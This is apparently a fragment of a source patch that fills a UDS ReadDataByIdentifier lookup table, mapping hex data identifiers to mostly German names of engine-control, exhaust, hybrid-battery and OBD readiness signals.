+UDS_RDBI.dataIdentifiers[0x6373] = "ESP Drehmomentanforderung Sperre" +UDS_RDBI.dataIdentifiers[0x6374] = "ART Momentenschnittstelle Sperre" +UDS_RDBI.dataIdentifiers[0x6375] = "Drehmomentanforderung Sperre irreversibel" +UDS_RDBI.dataIdentifiers[0x6376] = "Erststartmodus" +UDS_RDBI.dataIdentifiers[0x6377] = "Zuendung" +UDS_RDBI.dataIdentifiers[0x6378] = "Tempomat Momentenanforderung" +UDS_RDBI.dataIdentifiers[0x6379] = "Tempomat Momentenanforderung Sq" +UDS_RDBI.dataIdentifiers[0x637a] = "On Adaption Status DMDADAP" +UDS_RDBI.dataIdentifiers[0x637b] = "On Adaption Fertig Bereich unten" +UDS_RDBI.dataIdentifiers[0x637c] = "On Adaption Fertig Bereich Mitte" +UDS_RDBI.dataIdentifiers[0x637d] = "On Adaption Fertig Bereich oben" +UDS_RDBI.dataIdentifiers[0x637e] = "Off Adaption Zaehlindex" +UDS_RDBI.dataIdentifiers[0x6380] = "Tempomat Momentenanforderung Erh hung" +UDS_RDBI.dataIdentifiers[0x6381] = "ESP SBC Momentenanforderung" +UDS_RDBI.dataIdentifiers[0x6382] = "ESP SBC Momentenanforderung Sq" +UDS_RDBI.dataIdentifiers[0x6383] = "Getriebe Momentenanforderung" +UDS_RDBI.dataIdentifiers[0x6384] = "Getriebe Momentenanforderung Sq" # or Zuendung Zaehler Gesamt +UDS_RDBI.dataIdentifiers[0x6385] = "Getriebe Momentenwunsch max" +UDS_RDBI.dataIdentifiers[0x6386] = "W hlhebelpositionssensor Fehler y Richtung" +UDS_RDBI.dataIdentifiers[0x6387] = "Waehlhebeldiagnose Min Motormoment" +UDS_RDBI.dataIdentifiers[0x6388] = "Abgasklappe Endstufe Sollwert PWM" +UDS_RDBI.dataIdentifiers[0x6389] = "Abgasklappe Zustandsautomat Vorgaengerbetriebsart" +UDS_RDBI.dataIdentifiers[0x6390] = "Abgasklappe Position Winkel" +UDS_RDBI.dataIdentifiers[0x6391] = "Abgasklappe Sollwert" +UDS_RDBI.dataIdentifiers[0x6392] = "Abgasklappe Lageregelung Sollwert intern" +UDS_RDBI.dataIdentifiers[0x6393] = "Abgasklappe Sollwert final" +UDS_RDBI.dataIdentifiers[0x6394] = "Abgasklappe Endstufe Spannung Sq" +UDS_RDBI.dataIdentifiers[0x6395] = "Abgasklappe Losreisszaehler aktiv" +UDS_RDBI.dataIdentifiers[0x6396] = "Abgasklappe Temperatur Sq" +UDS_RDBI.dataIdentifiers[0x6397] = "Abgasklappe Zaehler Fehlerheilung" +UDS_RDBI.dataIdentifiers[0x6398] = "Motorzustand aktuell" +UDS_RDBI.dataIdentifiers[0x6399] = "Drehzahl Antriebsstrang gefiltert" +UDS_RDBI.dataIdentifiers[0x6406] = "Anzahl restl. Fahrzyklen f. Stoppverbot im Fahrzeugwerk" +UDS_RDBI.dataIdentifiers[0x6407] = "Stoppverbot durch irreversible Fehlerreaktion mit Kraftstoffabschaltung" +UDS_RDBI.dataIdentifiers[0x6420] = "Gemischadaption FAPAFG laeuft" +UDS_RDBI.dataIdentifiers[0x6421] = "Gemischadaption FAPAFG fertig" +UDS_RDBI.dataIdentifiers[0x6422] = "Gemischadaption FAPAFG Betriebspunktanzeige" +UDS_RDBI.dataIdentifiers[0x6423] = "Gemischadaption FAPAFG Reset Gradientenstabilitaet" +UDS_RDBI.dataIdentifiers[0x6424] = "Gemischadaption FAPAFG Reset Offsetstabilitaet" +UDS_RDBI.dataIdentifiers[0x6425] = "Gemischadaption FAPAFG Momenten Reserve" +UDS_RDBI.dataIdentifiers[0x6426] = "Gemischadaption FAPAFG DTC durch FAPAFG oder Basisfunktion" +UDS_RDBI.dataIdentifiers[0x6427] = "Gemischadaption FAPAFG Solldrehzahl" +UDS_RDBI.dataIdentifiers[0x6428] = "Gemischadaption FAPAFG Offset Massenstrom adaptiert" +UDS_RDBI.dataIdentifiers[0x6429] = "Gemischadaption FAPAFG Offset Saugrohrdruck adaptiert" +UDS_RDBI.dataIdentifiers[0x642a] = "Gemischadaption FAPAFG Lastanforderung" +UDS_RDBI.dataIdentifiers[0x642b] = "Gemischadaption FAPAFG Abbruchgrund Ueberwachung" +UDS_RDBI.dataIdentifiers[0x642c] = "Gemischadaption FAPAFG Ueberwachung freigeschaltet" +UDS_RDBI.dataIdentifiers[0x6430] = "Saugrohrdruck gefiltert" +UDS_RDBI.dataIdentifiers[0x6431] = "Motordrehmoment koordiniert fuer Fuellung" +UDS_RDBI.dataIdentifiers[0x6432] = "Saugrohrdruck gefiltert plausibilisiert" +UDS_RDBI.dataIdentifiers[0x6433] = "Motordrehmoment Referenzmoment" +UDS_RDBI.dataIdentifiers[0x6434] = "Motordrehmoment Verlust gefiltert" +UDS_RDBI.dataIdentifiers[0x6435] = "Off Adaption Fertig Bereich1 EOL" +UDS_RDBI.dataIdentifiers[0x6436] = "Off Adaption Lernfilter Aktuell KatheizSegment" +UDS_RDBI.dataIdentifiers[0x6437] = "Off Adaption Lernfilter Resetzaehler" +UDS_RDBI.dataIdentifiers[0x6438] = "Off Adaption Lernfilter Resetzaehler KatheizSegment" +UDS_RDBI.dataIdentifiers[0x6439] = "Off Adaption Ergebniswert DMDFOF3 KatheizSegment" +UDS_RDBI.dataIdentifiers[0x643a] = "Off Adaption Filterwert Segmentabw KatheizSegment" +UDS_RDBI.dataIdentifiers[0x643b] = "Off Adaption korrigierte Segmentdauer" +UDS_RDBI.dataIdentifiers[0x6442] = "Ladedruck Regelabweichung" +UDS_RDBI.dataIdentifiers[0x6443] = "Ladedruck Regelabweichung gemittelt" +UDS_RDBI.dataIdentifiers[0x6444] = "Ladedruckregelung I Anteil" +UDS_RDBI.dataIdentifiers[0x6445] = "Ladedruckregelung Sollwert" +UDS_RDBI.dataIdentifiers[0x6450] = "Start Stop Analysewerte Fehlercode1" +UDS_RDBI.dataIdentifiers[0x6451] = "Start Stop Analysewerte Fehlercode2" +UDS_RDBI.dataIdentifiers[0x6452] = "Start Stop Analysewerte Fehlercode3" +UDS_RDBI.dataIdentifiers[0x6453] = "Start Stop Analysewerte Fehlercode4" +UDS_RDBI.dataIdentifiers[0x6454] = "Start Stop Analysewerte Fehlercode5" +UDS_RDBI.dataIdentifiers[0x6455] = "Ueberwachung Status Diagnose1" +UDS_RDBI.dataIdentifiers[0x6456] = "Ueberwachung Status Diagnose2" +UDS_RDBI.dataIdentifiers[0x6457] = "Bremsmoment Fahrer" +UDS_RDBI.dataIdentifiers[0x6458] = "Motorkuehlkreislauf Temperatur" +UDS_RDBI.dataIdentifiers[0x6459] = "Umgebungsvariable1" +UDS_RDBI.dataIdentifiers[0x6460] = "Umgebungsvariable2" +UDS_RDBI.dataIdentifiers[0x6461] = "Umgebungsvariable3" +UDS_RDBI.dataIdentifiers[0x6470] = "Expansionsventil Fehlerstatus" +UDS_RDBI.dataIdentifiers[0x6471] = "Drehschieberventil Fail Safe Ena Flag" +UDS_RDBI.dataIdentifiers[0x6472] = "Drehschieberventil Hybrid Codier Byte Fehler" +UDS_RDBI.dataIdentifiers[0x6473] = "Drehschieberventil Hybrid Codier Byte Fehler" +UDS_RDBI.dataIdentifiers[0x6474] = "Drehschieberventil BMS Fail Safe Ena Flag" +UDS_RDBI.dataIdentifiers[0x6475] = "Kuehlmittelpumpe Ladeluft Bypass Drehzahl" +UDS_RDBI.dataIdentifiers[0x6476] = "Kuehlmittelpumpe Ladeluft Bypass Drehzahl Sq" +UDS_RDBI.dataIdentifiers[0x6477] = "Kuehlmittelpumpe Ladeluft Bypass Fehler" +UDS_RDBI.dataIdentifiers[0x6478] = "Kuehlmittelpumpe Ladeluft Sollwert Sq" +UDS_RDBI.dataIdentifiers[0x6479] = "Kuehlmittelpumpe NT1 Fehlerstatus" +UDS_RDBI.dataIdentifiers[0x6480] = "Kuehlmittelpumpe LVPTC Fehler" +UDS_RDBI.dataIdentifiers[0x6481] = "Kuehlmittelpumpe BMS Drehzahl" +UDS_RDBI.dataIdentifiers[0x6482] = "Kuehlmittelpumpe BMS Sollwert Sq" +UDS_RDBI.dataIdentifiers[0x6483] = "Kuehlmittelpumpe BMS Bypass Fehler" +UDS_RDBI.dataIdentifiers[0x6484] = "Kuehlerjalousie LIN Istposition" +UDS_RDBI.dataIdentifiers[0x6485] = "Kuehlerjalousie LIN Status Init" +UDS_RDBI.dataIdentifiers[0x6486] = "Kuehlerjalousie LIN Fehlerheilung max" +UDS_RDBI.dataIdentifiers[0x6487] = "Kuehlerjalousie LIN Umgebungsdaten" +UDS_RDBI.dataIdentifiers[0x6490] = "Luefteranforderung Ladeluftkuehlung" +UDS_RDBI.dataIdentifiers[0x6491] = "Luefteraktivierung Anforderung Sq" +UDS_RDBI.dataIdentifiers[0x6492] = "Luefter LIN Umgebungsdaten" +UDS_RDBI.dataIdentifiers[0x649c] = "Gemischadaption Prioritaet Count Down Zeitzaehler" +UDS_RDBI.dataIdentifiers[0x64a0] = "Aussetzer Laufunruhe Testgroesse zu gross akt Betriebsbereich" +UDS_RDBI.dataIdentifiers[0x64a1] = "Aussetzer Laufunruhe zu gross akt Betriebsbereich" +UDS_RDBI.dataIdentifiers[0x64a2] = "Aussetzer erkannt" +UDS_RDBI.dataIdentifiers[0x6500] = "Ueberwachung Reset Status 0" +UDS_RDBI.dataIdentifiers[0x6501] = "Innenwiderstand HV-Batterie beim Laden" +UDS_RDBI.dataIdentifiers[0x6502] = "Innenwiderstand HV-Batterie beim Entladen" +UDS_RDBI.dataIdentifiers[0x6503] = "Batteriestrom der HV-Batterie" +UDS_RDBI.dataIdentifiers[0x6504] = "Stromintegral zur Bestimmung der Kapazitaet der HV-Batterie" # or Ueberwachung Reset Status 4 +UDS_RDBI.dataIdentifiers[0x6505] = "Ueberwachung Reset Status 5" # or Ladezustand (SOC) der HV-Batterie +UDS_RDBI.dataIdentifiers[0x6506] = "Ueberwachung Reset Status 6" # or Ladezustand (SOC) der HV-Batterie nach Spannungs-tabelle +UDS_RDBI.dataIdentifiers[0x6507] = "Ueberwachung Reset Status 7" +UDS_RDBI.dataIdentifiers[0x6508] = "Ueberwachung Software Reset Status 0" +UDS_RDBI.dataIdentifiers[0x6509] = "Ueberwachung Software Reset Status" +UDS_RDBI.dataIdentifiers[0x6510] = "OCV-Kennlinie der HV-Batterie" +UDS_RDBI.dataIdentifiers[0x6511] = "Ueberwachung Software Reset Status" +UDS_RDBI.dataIdentifiers[0x6512] = "Ueberwachung Software Reset Status 4" +UDS_RDBI.dataIdentifiers[0x6513] = "Ueberwachung Software Reset Status 5" +UDS_RDBI.dataIdentifiers[0x6514] = "Ueberwachung Software Reset Status 6" +UDS_RDBI.dataIdentifiers[0x6515] = "Ueberwachung Software Reset Status 7" +UDS_RDBI.dataIdentifiers[0x6527] = "Ueberwachung Ebene2 Limit Max Moment" +UDS_RDBI.dataIdentifiers[0x6528] = "Ueberwachung Ebene2 Limit Min Moment" +UDS_RDBI.dataIdentifiers[0x6529] = "Ueberwachung Moment koord max Wert" +UDS_RDBI.dataIdentifiers[0x6530] = "Momentenwunsch Fahrer effektiv" +UDS_RDBI.dataIdentifiers[0x6531] = "Ueberwachung ESP koord Sollmoment" +UDS_RDBI.dataIdentifiers[0x6532] = "Ueberwachung ESP koord Sollmoment" +UDS_RDBI.dataIdentifiers[0x6533] = "Ueberwachung ESP lim koord Sollmoment" +UDS_RDBI.dataIdentifiers[0x6534] = "Ueberwachung PT Istmoment Ebene" +UDS_RDBI.dataIdentifiers[0x6535] = "Ueberwachung zul Sollmoment Ebene" +UDS_RDBI.dataIdentifiers[0x6536] = "Ueberwachung Verbrennungsmotor Sollmoment Ebene" +UDS_RDBI.dataIdentifiers[0x6537] = "Ueberwachung red Sollmoment Ebene" +UDS_RDBI.dataIdentifiers[0x6538] = "Ueberwachung PT Sollmoment Ebene" +UDS_RDBI.dataIdentifiers[0x6539] = "Ueberwachung PT lim Sollmoment Ebene" +UDS_RDBI.dataIdentifiers[0x6540] = "Klopferkennung Referenzpegel HWZyl1" # or Ueberwachung Istgang plaus Ebene +UDS_RDBI.dataIdentifiers[0x6541] = "Ueberwachung Gesamtbremsmoment plaus Ebene" # or Klopferkennung Referenzpegel HWZyl2 +UDS_RDBI.dataIdentifiers[0x6542] = "Ueberwachung E Maschine Istmoment plaus Ebene" # or Klopferkennung Referenzpegel HWZyl3 +UDS_RDBI.dataIdentifiers[0x6543] = "Ueberwachung Verbrennungsmotor Drehzahl Ebene" +UDS_RDBI.dataIdentifiers[0x6544] = "Verbrennungsmotor Start abgeschlossen" +UDS_RDBI.dataIdentifiers[0x6545] = "Enermanag Losfahrschutz aktiv" +UDS_RDBI.dataIdentifiers[0x6546] = "Vorklimatisierung Konditionierung aktiv" +UDS_RDBI.dataIdentifiers[0x6572] = "Ueberwachung Hybrid Status Diagnose Ebene2" +UDS_RDBI.dataIdentifiers[0x6580] = "Lambdaabweichung HWZyl1" +UDS_RDBI.dataIdentifiers[0x6581] = "Lambdaabweichung HWZyl2" +UDS_RDBI.dataIdentifiers[0x6582] = "Lambdaabweichung HWZyl3" +UDS_RDBI.dataIdentifiers[0x65a0] = "Aussetzerzaehler Homogen HWZyl1" +UDS_RDBI.dataIdentifiers[0x65a1] = "Aussetzerzaehler Homogen HWZyl2" +UDS_RDBI.dataIdentifiers[0x65a2] = "Aussetzerzaehler Homogen HWZyl3" +UDS_RDBI.dataIdentifiers[0x65c1] = "Schubabschalte Bereitschaft Bauteileschutz" +UDS_RDBI.dataIdentifiers[0x65c2] = "Schubabschalte Bereitschaft TEV Schliessen" +UDS_RDBI.dataIdentifiers[0x65c4] = "Schubabschalte Bereitschaft Freigabe" +UDS_RDBI.dataIdentifiers[0x65c5] = "Schubabschalte Bereitschaft Abgastemperaturmodell" +UDS_RDBI.dataIdentifiers[0x65c6] = "Abgasstrang Bauteileschutz aktiv" +UDS_RDBI.dataIdentifiers[0x65e0] = "FBS Renault Diagnosedaten verfuegbar" +UDS_RDBI.dataIdentifiers[0x65e1] = "FBS Renault Diagnosedaten Teil1" +UDS_RDBI.dataIdentifiers[0x65e2] = "FBS Renault Diagnosedaten Teil2" +UDS_RDBI.dataIdentifiers[0x65e3] = "FBS Renault Diagnosedaten Teil3" +UDS_RDBI.dataIdentifiers[0x65e4] = "FBS Renault Startfreigabe Steuergeraet" +UDS_RDBI.dataIdentifiers[0x65e5] = "FBS Renault Startfreigabe EZS gesichert" +UDS_RDBI.dataIdentifiers[0x65e6] = "FBS Renault Startfreigabe EZS Autorisierung" +UDS_RDBI.dataIdentifiers[0x65e7] = "FBS Renault Startfreigabe EZS Kommunikation" +UDS_RDBI.dataIdentifiers[0x65e8] = "FBS Renault Startfreigabe" +UDS_RDBI.dataIdentifiers[0x6640] = "Tempomat" +UDS_RDBI.dataIdentifiers[0x6667] = "Motorzustand Nachstartanreicherung abgeschaltet" +UDS_RDBI.dataIdentifiers[0x6800] = "Egf flgDtm" # or EGFC DTM EGFC DTM +UDS_RDBI.dataIdentifiers[0x6801] = "EgfPwrStg ctrSt" # or EGFC Hw State EGFC Hw State +UDS_RDBI.dataIdentifiers[0x6802] = "EGFC Err Mode EGFC Err" # or Egf sq +UDS_RDBI.dataIdentifiers[0x6803] = "SCRT Err Mode SCRT Err" +UDS_RDBI.dataIdentifiers[0x6804] = "EgfAgSnsr1Volt sq" # or EGFP Raw Err Mode EGFP Raw Err +UDS_RDBI.dataIdentifiers[0x6805] = "LEGRT Raw Err Mode LEGRT Raw Err" +UDS_RDBI.dataIdentifiers[0x6806] = "TSPC Med Err Mode TSPC Med Err" +UDS_RDBI.dataIdentifiers[0x6807] = "LEGRFP Raw Err Mode LEGRFP Raw Err" # or EgrfAgSnsr1Volt sq +UDS_RDBI.dataIdentifiers[0x6808] = "EGT Err Mode EGT Err" +UDS_RDBI.dataIdentifiers[0x6809] = "LEGRT Err Mode LEGRT Err" +UDS_RDBI.dataIdentifiers[0x680a] = "DPFLR PDiff Raw Err" # or LEGR PDiff Raw Err Mode LEGR PDiff Raw Err +UDS_RDBI.dataIdentifiers[0x680b] = "AAP Err Mode AAP Err" +UDS_RDBI.dataIdentifiers[0x680c] = "EGP Err Mode EGP Err" +UDS_RDBI.dataIdentifiers[0x680d] = "ECT Err Mode ECT Err" +UDS_RDBI.dataIdentifiers[0x680e] = "DPFLR Pdiff Err" # or LEGR Pdiff Err Mode LEGR PDiff Err +UDS_RDBI.dataIdentifiers[0x680f] = "EGFP Err Mode EGFP Err" # or EgfPosn sq +UDS_RDBI.dataIdentifiers[0x6810] = "Eng Run Mode Eng Run" +UDS_RDBI.dataIdentifiers[0x6811] = "IgnSwRun Mode IgnSwRun" +UDS_RDBI.dataIdentifiers[0x6812] = "Exhaust gas flap EGFC BreakAway ActvCntr" # or EGFC BreakAway ActvCntr EGFC BreakAway ActvCntr +UDS_RDBI.dataIdentifiers[0x6813] = "EgfPosnLrn flgAcv" # or EGFC PosnLrn Actv Mode EGFC PosnLrn Actv +UDS_RDBI.dataIdentifiers[0x6814] = "EGFC PosnLrn EnvAbtd Mode EGFC PosnLrn EnvAbtd" # or EgfPosnLrn flgAbtd +UDS_RDBI.dataIdentifiers[0x6815] = "EGFC PosnLrn Err Mode EGFC PosnLrn Err" # or EgfPosnLrn flgFlt +UDS_RDBI.dataIdentifiers[0x6816] = "EGFC PosnLrn Rdy Mode EGFC PosnLrn Rdy" # or EgfPosnLrn flgRdy +UDS_RDBI.dataIdentifiers[0x6820] = "EgfPwrStgVolt Volt" +UDS_RDBI.dataIdentifiers[0x6821] = "st EgrfDiagcTest" # or Egrf flgDtm +UDS_RDBI.dataIdentifiers[0x6822] = "st EgrfPwrStg" # or EgrfPwrStg ctrSt +UDS_RDBI.dataIdentifiers[0x6823] = "EgrfPosnCtl percSpDtm" # or perc EgrfAgSpDiag +UDS_RDBI.dataIdentifiers[0x6824] = "err Egrf" # or Egrf sq +UDS_RDBI.dataIdentifiers[0x6825] = "EgrfPwrStg percPwmSp" # or perc EgrfPwmSp +UDS_RDBI.dataIdentifiers[0x6826] = "st Egrf" +UDS_RDBI.dataIdentifiers[0x682b] = "flg ErgfPosnLrnAbtd" # or EgrfPosnLrn flgAbtd +UDS_RDBI.dataIdentifiers[0x682c] = "flg EgrfPosnLrnFlt" # or EgrfPosnLrn flgFlt +UDS_RDBI.dataIdentifiers[0x682d] = "n Eng" +UDS_RDBI.dataIdentifiers[0x682e] = "In vehicle total distance Read In vehicle total distance" +UDS_RDBI.dataIdentifiers[0x6834] = "flg EgrfPosnLrnSucs" # or EgrfPosnLrn flgSucs +UDS_RDBI.dataIdentifiers[0x6835] = "perc EgrfAgSp" # or EgrfPosnCtl percSp +UDS_RDBI.dataIdentifiers[0x6836] = "EgfPwrStg flgSwOffReq" # or Exhaust gas flap PwrOffReq +UDS_RDBI.dataIdentifiers[0x6837] = "Exhaust gas flap EngStrtDis" # or EgfSm flgEngStrtDi +UDS_RDBI.dataIdentifiers[0x6838] = "Exhaust gas flap PosnLrn succ mode" # or EgfPosnLrn flgSucs +UDS_RDBI.dataIdentifiers[0x6839] = "LEGRT Tdrift Freeze" +UDS_RDBI.dataIdentifiers[0x683a] = "LEGRT Tdrift Freeze" +UDS_RDBI.dataIdentifiers[0x683b] = "LEGRT Phys Max" +UDS_RDBI.dataIdentifiers[0x683c] = "LEGRT Start" +UDS_RDBI.dataIdentifiers[0x683f] = "EgfSm ctrSt" +UDS_RDBI.dataIdentifiers[0x6841] = "EgrfPwrStgVolt Volt" +UDS_RDBI.dataIdentifiers[0x6b00] = "Read MIB Entry" +UDS_RDBI.dataIdentifiers[0xaa01] = "Module Temp Sensor 5" +UDS_RDBI.dataIdentifiers[0xaa02] = "Module Temp Sensor 5 Voltage" +UDS_RDBI.dataIdentifiers[0xaa03] = "Inlet Coolant Temp Sensor" +UDS_RDBI.dataIdentifiers[0xaa04] = "Inlet Coolant Temp Sensor Voltage" +UDS_RDBI.dataIdentifiers[0xaa05] = "Pump" +UDS_RDBI.dataIdentifiers[0xaa21] = "Module 21 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0xaa22] = "Module 22 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0xaa23] = "Module 23 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0xaa24] = "Module 24 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0xaa25] = "Module 25 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0xaa26] = "Module 26 Voltage Sensor" +UDS_RDBI.dataIdentifiers[0xaa27] = "Liquid Coolant outlet Temp Voltage" +UDS_RDBI.dataIdentifiers[0xaa28] = "Liquid Coolant outlet Temp" +UDS_RDBI.dataIdentifiers[0xaa29] = "Liquid Coolant Pump Command" +UDS_RDBI.dataIdentifiers[0xaa30] = "Liquid Coolant Pump Speed feedback" +UDS_RDBI.dataIdentifiers[0xaa31] = "Open Cable Detection status" +UDS_RDBI.dataIdentifiers[0xaa32] = "Status of Command of Pump Function" +UDS_RDBI.dataIdentifiers[0xaa33] = "Status of Command of FAN Function" +UDS_RDBI.dataIdentifiers[0xaa34] = "Status of Contactor Device Control Function" +UDS_RDBI.dataIdentifiers[0xaa35] = "battery Status of Isolation Fault Diagnostic Control " +UDS_RDBI.dataIdentifiers[0xaa36] = "Status of Contactor Weld Check" +UDS_RDBI.dataIdentifiers[0xaa37] = "Status of Active Discharge" +UDS_RDBI.dataIdentifiers[0xaa42] = "Control Module Voltage" +UDS_RDBI.dataIdentifiers[0xb000] = "Readiness Katalysator" +UDS_RDBI.dataIdentifiers[0xb001] = "iness Lufteinblasung" # or Readiness Sekundaerluftsystem +UDS_RDBI.dataIdentifiers[0xb002] = "iness O2 Sonde" # or Readiness O2-Sonde +UDS_RDBI.dataIdentifiers[0xb003] = "iness O2 Sondenheizung" # or Readiness O2-Sondenheizung +UDS_RDBI.dataIdentifiers[0xb004] = "ora2 LR-Adaption Additiv" +UDS_RDBI.dataIdentifiers[0xb005] = "ora LR-Adaption Additiv" # or Zyklusflag GA LR Adaption Additiv +UDS_RDBI.dataIdentifiers[0xb006] = "fra2 LR-Adaption Multiplikativ" +UDS_RDBI.dataIdentifiers[0xb007] = "fra LR-Adaption Multiplikativ" # or Zyklusflag GA LR Adaption Multiplikativ +UDS_RDBI.dataIdentifiers[0xb008] = "dylsu LSU Dynamikdiagnose" # or Zyklusflag LSU Dynamikdiagnose +UDS_RDBI.dataIdentifiers[0xb009] = "dylsu2 LSU Dynamikdiagnose" +UDS_RDBI.dataIdentifiers[0xb010] = "helsu LSU Fehlerpfad HELSU" +UDS_RDBI.dataIdentifiers[0xb011] = "EZS Typ Baureihe" # or helsu2 LSU Fehlerpfad HELSU, EZS Typ +UDS_RDBI.dataIdentifiers[0xb012] = "Zyklusflag LS Heizung Hinter Hauptkat" # or hsh LS Heizung hinter Kat (DE, HF Empfangsdaten +UDS_RDBI.dataIdentifiers[0xb013] = "hsh2 LS Heizung hinter Kat (DE" +UDS_RDBI.dataIdentifiers[0xb014] = "Zyklusflag LS Heizung Hinter Hauptkat Endstufe" # or hshe LS Heizung hinter Kat (DE +UDS_RDBI.dataIdentifiers[0xb015] = "hshe2 LS Heizung hinter Kat (DE" +UDS_RDBI.dataIdentifiers[0xb016] = "Zyklusflag LS Heizung Vor Kat" # or hsv LS Heizung vor Kat +UDS_RDBI.dataIdentifiers[0xb017] = "hsv2 LS Heizung vor Kat" +UDS_RDBI.dataIdentifiers[0xb018] = "Zyklusflag LS Heizung Vor Kat Endstufe" # or hsve LS Heizung vor Kat Endstufe +UDS_RDBI.dataIdentifiers[0xb019] = "hsve2 LS Heizung vor Kat Endstufe" +UDS_RDBI.dataIdentifiers[0xb020] = "Tiefentladeschutz" # or iclsu LSU Auswerte IC +UDS_RDBI.dataIdentifiers[0xb021] = "iclsu2 LSU Auswerte IC" +UDS_RDBI.dataIdentifiers[0xb022] = "lash LS Alterung hinter Kat (DE" # or Zyklusflag LS Alterung Hinter Hauptkat +UDS_RDBI.dataIdentifiers[0xb023] = "lash2 LS Alterung hinter Kat (DE" +UDS_RDBI.dataIdentifiers[0xb024] = "lshv LS Vertauschung Hinter Kat (DE" +UDS_RDBI.dataIdentifiers[0xb025] = "lsvv LS Vertauschung Vor Kat" +UDS_RDBI.dataIdentifiers[0xb026] = "ulsu LS an Luft" +UDS_RDBI.dataIdentifiers[0xb027] = "ulsu2 LS an Luft" +UDS_RDBI.dataIdentifiers[0xb028] = "Zyklusflag LS Hinter Hauptkat" # or lsh LS hinter Kat (DE +UDS_RDBI.dataIdentifiers[0xb029] = "lsh2 LS hinter Kat (DE" +UDS_RDBI.dataIdentifiers[0xb030] = "lsuia LS Leitung an Bond IA" +UDS_RDBI.dataIdentifiers[0xb031] = "lsuia2 LS Leitung an Bond IA" +UDS_RDBI.dataIdentifiers[0xb032] = "lsuip Leitungssunterbrechung an IP" +UDS_RDBI.dataIdentifiers[0xb033] = "lsuip2 Leitungssunterbrechung an IP" +UDS_RDBI.dataIdentifiers[0xb034] = "lsuks Kurzschluss Sondenleitung" +UDS_RDBI.dataIdentifiers[0xb035] = "lsuks2 Kurzschluss Sondenleitung" +UDS_RDBI.dataIdentifiers[0xb036] = "lsuun LS Leitung an Bond UN" +UDS_RDBI.dataIdentifiers[0xb037] = "lsuun2 LS Leitung an Bond UN" +UDS_RDBI.dataIdentifiers[0xb038] = "lsuvm LS Leitung an Bond VM" +UDS_RDBI.dataIdentifiers[0xb039] = "lsuvm2 LS Leitung an Bond VM" +UDS_RDBI.dataIdentifiers[0xb040] = "lsv LS vor Kat" +UDS_RDBI.dataIdentifiers[0xb041] = "lsv2 LS vor Kat" +UDS_RDBI.dataIdentifiers[0xb042] = "lsve Elektrischer Fehler Vor Kat" +UDS_RDBI.dataIdentifiers[0xb043] = "lsve2 Elektrischer Fehler Vor Kat" +UDS_RDBI.dataIdentifiers[0xb044] = "pllsu Plausibilitaet der LSU" # or Zyklusflag Plausibilitaet der LSU +UDS_RDBI.dataIdentifiers[0xb045] = "pllsu2 Plausibilitaet der LSU" +UDS_RDBI.dataIdentifiers[0xb046] = "Zyklusflag NW Einlass Zuordnung NW ZU KW" # or nwkwe Zuordnung Einlass NW zu KW +UDS_RDBI.dataIdentifiers[0xb047] = "nwkwe2 Zuordnung Einlass NW zu KW" +UDS_RDBI.dataIdentifiers[0xb048] = "nwkwa Zuordnung Auslass NW zu KW" +UDS_RDBI.dataIdentifiers[0xb049] = "nwkwa2 Zuordnung Auslass NW zu KW" +UDS_RDBI.dataIdentifiers[0xb050] = "Zyklusflag NW Einlass Verriegelungsposition Start" # or nwvpe Verriegelungsposition Einlass waehrend Start +UDS_RDBI.dataIdentifiers[0xb051] = "nwvpe2 Verriegelungsposition Einlass waehrend Start" +UDS_RDBI.dataIdentifiers[0xb052] = "nwvpa Verriegelungsposition Auslass waehrend Start" +UDS_RDBI.dataIdentifiers[0xb053] = "nwvpa2 Verriegelungsposition Auslass waehrend Start" +UDS_RDBI.dataIdentifiers[0xb054] = "Zyklusflag Sekundaerluftsystem" # or sls Sekundaerluftsystem +UDS_RDBI.dataIdentifiers[0xb055] = "sls2 Sekundaerluftsystem" +UDS_RDBI.dataIdentifiers[0xb056] = "Zyklusflag Sekundaerluftventil" # or slv Sekundaerventil +UDS_RDBI.dataIdentifiers[0xb057] = "slv2 Sekundaerventil" +UDS_RDBI.dataIdentifiers[0xb058] = "Zyklusflag Sekundaerluftpumpe Endstufe" # or slpe Sekundaerpumpe Endstufe +UDS_RDBI.dataIdentifiers[0xb059] = "slve Sekundaerventil Endstufe" # or Zyklusflag Sekundaerluftventil Endstufe +UDS_RDBI.dataIdentifiers[0xb060] = "Zyklusflag Absperrventil Aktivkohlefilter" +UDS_RDBI.dataIdentifiers[0xb061] = "Zyklusflag Tankentlueftlungssystem Feinleck" +UDS_RDBI.dataIdentifiers[0xb063] = "Zyklusflag Tankentlueftlungssystem Kleinstleck" +UDS_RDBI.dataIdentifiers[0xb100] = "Readiness PID01" +UDS_RDBI.dataIdentifiers[0xb101] = "iness PID41" +UDS_RDBI.dataIdentifiers[0xb200] = "HFA Product Identification Function ID" +UDS_RDBI.dataIdentifiers[0xb500] = "Counter Motorstarts" +UDS_RDBI.dataIdentifiers[0xb501] = "Allgemeiner Nenner" +UDS_RDBI.dataIdentifiers[0xb502] = "Katalysator rechts" +UDS_RDBI.dataIdentifiers[0xb503] = "Katalysator rechts" +UDS_RDBI.dataIdentifiers[0xb504] = "Katalysator links" +UDS_RDBI.dataIdentifiers[0xb505] = "Katalysator links" +UDS_RDBI.dataIdentifiers[0xb506] = "EVAP" # or Tankdichtigkeitsdiagnose 05mm +UDS_RDBI.dataIdentifiers[0xb507] = "EVAP" # or Tankdichtigkeitsdiagnose 05mm +UDS_RDBI.dataIdentifiers[0xb508] = "Sekundaerluftsystem" +UDS_RDBI.dataIdentifiers[0xb509] = "Sekundaerluftsystem" +UDS_RDBI.dataIdentifiers[0xb510] = "Sonde vorKat Mode9 rechts" +UDS_RDBI.dataIdentifiers[0xb511] = "Sonde vorKat Mode9 rechts" +UDS_RDBI.dataIdentifiers[0xb512] = "Sonde vorKat Mode9 links" +UDS_RDBI.dataIdentifiers[0xb513] = "Sonde vorKat Mode9 links" +UDS_RDBI.dataIdentifiers[0xb514] = "AGR oder NoWe Verstellung Mode9" +UDS_RDBI.dataIdentifiers[0xb515] = "AGR oder NoWe Verstellung Mode9" +UDS_RDBI.dataIdentifiers[0xb51a] = "OBD RBM Werte als Hex-Dump" +UDS_RDBI.dataIdentifiers[0xb51b] = "Erweiterte RBM Werte als Hex-Dump" +UDS_RDBI.dataIdentifiers[0xb520] = "Tankdichtigkeitsdiagnose 1 mm" 